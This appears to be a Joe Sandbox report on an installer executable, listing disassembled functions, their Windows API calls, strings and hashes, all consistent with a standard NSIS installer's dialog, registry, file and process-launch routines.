Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
N, xrefs: 0040426C
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E
[Rename], xrefs: 00406BC8, 00406BD7

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00019000,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
